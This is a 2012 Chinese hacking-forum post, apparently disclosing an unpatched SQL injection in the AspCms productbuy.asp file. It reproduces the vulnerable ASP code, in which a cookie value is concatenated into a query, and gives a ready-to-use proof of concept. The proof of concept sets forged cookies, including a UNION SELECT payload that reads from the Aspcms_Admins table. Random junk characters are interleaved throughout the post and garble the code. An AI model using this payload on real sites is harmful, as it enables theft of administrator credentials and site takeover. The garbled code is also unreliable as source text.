好久没上土司了,上来一看发现在删号名单内.....
2 o$ G( E5 q% i0 s也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
) F$ O) ^4 F! H8 M$ S5 Z废话不多说,看代码:. z$ N, P0 d& S, P! B" V
# s$ ]: `3 i. x* u& s; ~( Y! x0 X
<%2 o8 X' M1 y# i% v w k( `
3 Q' N2 Z# N- }4 w) C5 [; Q
if action = "buy" then
5 o+ f+ K! H( ~6 ?$ Z2 s( r8 Q- Y7 G+ z2 L' X% E$ h: ?% i+ p
addOrder()/ w1 f4 C% Z. M+ N$ U
% Q0 ]/ S: E$ Jelse( N* _) {$ i2 ~) A Q- C
4 Y, x& L8 E% m echoContent()
' ` N: [. U5 F: @$ Q% E- i& L
end if
! U5 {* D( t3 N8 H2 u3 ~) X- d! K9 m- g" g
- [9 `9 x5 }$ t
$ E# {6 k( f/ w; i# f6 j- w) J7 T" x) [……略过
+ V7 T3 I$ v9 o# x/ C J1 l% D
- ?* L# r: o: _ ?- e! ?$ ]) {* u2 p% _- `' z) u i
5 p. A9 g+ a& [$ _Sub echoContent()
; T- X# B8 O2 O2 Z$ c4 q% |/ Y9 n
dim id
5 o! f( E r' n* w
$ Q" D* P! k) u; ^0 X |7 t id=getForm("id","get")% h/ o- j' P! v! p7 D# D0 P! l6 `
8 s E# M( x; h1 K, ]
( M- ]* F. x7 F$ ?) i0 K8 b
0 i5 e: G* q1 G
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
3 E* s" V* Y3 C; F+ a; s5 e( R( b* H
. w3 M. \ u4 g$ }
# m/ j" d8 c* D9 _8 k1 ]3 T
T! l L$ ^$ N) k6 P8 o dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
5 x; x3 E) Z. h# H# u; {6 _
9 l: ]- u, h" W6 ?3 l dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
( J \0 F1 ?1 }
2 E$ {% s0 r; ?9 A ?3 X* T! U Dim templatePath,tempStr
7 l9 ?5 Y- V4 e3 U, f1 i, j- q* \
0 ^0 ]: A W9 L. U$ F) e templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
9 Q8 H' |$ R( }- ^4 |4 }8 i) N$ t. Y% e9 T; u7 {$ z" X) r0 u ~
9 _% c( Y. ^% C% u7 ^+ ]
' b+ k, f- V4 \0 m set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
6 P& k* V0 } @$ ^+ j2 c! z* Z: ^' @* n9 |+ ] l
selectproduct=rsObj(0)+ i& E" j% N( i7 m( r8 i) V! L
; C! G7 i% m4 X* W: e0 M 9 r. j1 u( Y* y% L* s( Y* |
. u- C; V- K# B; \9 h( S, Y$ J Dim linkman,gender,phone,mobile,email,qq,address,postcode, X6 ]: ~; b. x% p" R
' w1 u4 }% p' n5 T
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
1 B+ q% a- G' c4 M* X& K9 W+ a, V0 V1 R% Q" ^
if rCookie("loginstatus")=1 then : G& S+ [ A7 h' f
5 @1 S. \8 r; H- D
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
; ~: x2 g) o) B/ J. d/ M1 K, `$ f. C9 n: d
linkman=rsObj("truename")
& D, i/ n) d- f2 k) ^. l4 J0 x6 C4 q7 B2 `
gender=rsObj("gender"); p, c- J+ O4 b0 M$ R* L
7 U4 }/ B! X1 ^" f& Y
phone=rsObj("phone")3 y* X/ _/ e# A* S2 b2 s
8 k" p/ n" L, f mobile=rsObj("mobile")
: O; l: B+ r" C2 ~1 C" H- M( S
% x/ F3 D6 v$ m ?7 V3 l2 f- O9 C email=rsObj("email")) q, \* k8 e( w0 e/ o
, l z6 S9 M' O F3 |' N
qq=rsObj("qq"), T: D$ ^; h4 ~
/ c' K1 C# `# `- t$ ^$ q
address=rsObj("address")
% t4 t' D" y- A" w) D; }# _+ m% [. G4 b+ F1 u; W& w
postcode=rsObj("postcode")
0 {' g9 }( |/ H0 N, r5 |/ j
" p+ i: Q h( n# J else
y; _# g; e: P1 j* x6 h( g! S5 n% l# q2 G* `
gender=1
0 l5 }6 j2 f; L8 ~5 @8 d- x i3 |
( Y5 O8 ~ S/ I% X; }& Q* _ end if4 v9 R! x. }2 \; r
$ f+ v5 g0 p/ |& x9 z rsObj.close()
3 a& n& s( h3 `2 M) t0 _' M4 A9 e1 I7 I# P5 E, c
/ l" S9 k6 x4 b2 u
! [# ?( H# X- |& }* f
with templateObj k! L) }' Q, ]; ]7 r
: e# f7 ]. o! |4 Y! O- d .content=loadFile(templatePath)
$ ~0 s$ o6 u I) ~* {+ ^9 X
4 Q$ j, f# F7 b; `1 L% V .parseHtml()0 v3 a# ]) a& U! R$ [1 G- C$ w
0 m! B" U3 N; P/ t3 E q .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
* y5 R/ @& L0 J; Q7 |6 m$ |' S1 v2 Y) P
.content=replaceStr(.content,"[aspcms:linkman]",linkman) . _+ b7 T6 ]6 b8 O& u8 A5 d
3 d* U& k4 z1 N+ H7 {1 Z& P# y/ n0 n4 A
.content=replaceStr(.content,"[aspcms:gender]",gender) 9 V8 P! R$ f. n
1 s/ L5 \: P; ?# X" k .content=replaceStr(.content,"[aspcms:phone]",phone) & s& Y) y: s. [( |6 S2 |* a
( F% |" ^- R- u/ A1 ^
.content=replaceStr(.content,"[aspcms:mobile]",mobile) ( [. y6 ]( ]7 W( U# o; X- X2 V
6 Z- B5 P6 K% ? .content=replaceStr(.content,"[aspcms:email]",email) 9 {, Y$ U, u) G" s% [* e, l& `. E
) e5 G) X7 r, I7 C% H .content=replaceStr(.content,"[aspcms:qq]",qq)
* t( o- p9 h! x: N6 g4 a4 i# g6 J! \$ I8 P# c+ y3 z
.content=replaceStr(.content,"[aspcms:address]",address)
& E- k4 p! T4 G3 W$ e7 ]& z7 f' I8 V( l/ G5 ~6 k( E1 ^
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
' F2 m. u: w3 q5 l: G; r" P
2 M. D+ |# J- C0 u" m7 ` .parseCommon()
. N$ z/ F0 B: n/ y/ F- M) c+ C8 R& x8 C3 S2 {" @1 n! ^: L
echo .content
6 J& M1 r; E4 \+ i
. F& _+ @+ v) k: O5 D i( A! Q5 D! I end with
( n/ h: N& p; H' _- o. d
! a0 h1 N: A6 e9 e) y$ l7 J set templateobj =nothing : terminateAllObjects
1 x& t' ?3 T& x! a' z5 I$ y k; h4 @4 f2 F( [
End Sub
) d& e. j; `3 W漏洞很明显,没啥好说的
N! T# Y6 I. R" O5 rpoc:
" @: [ P7 J. n7 g& _# T) {4 Q G4 R5 w6 ^8 `4 e s' [
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子7 |( b8 g* s7 A( a
2 E/ [( Y& f: H; Z5 a1 u |
发表于 2012-12-27 08:35:05
收藏
支持
反对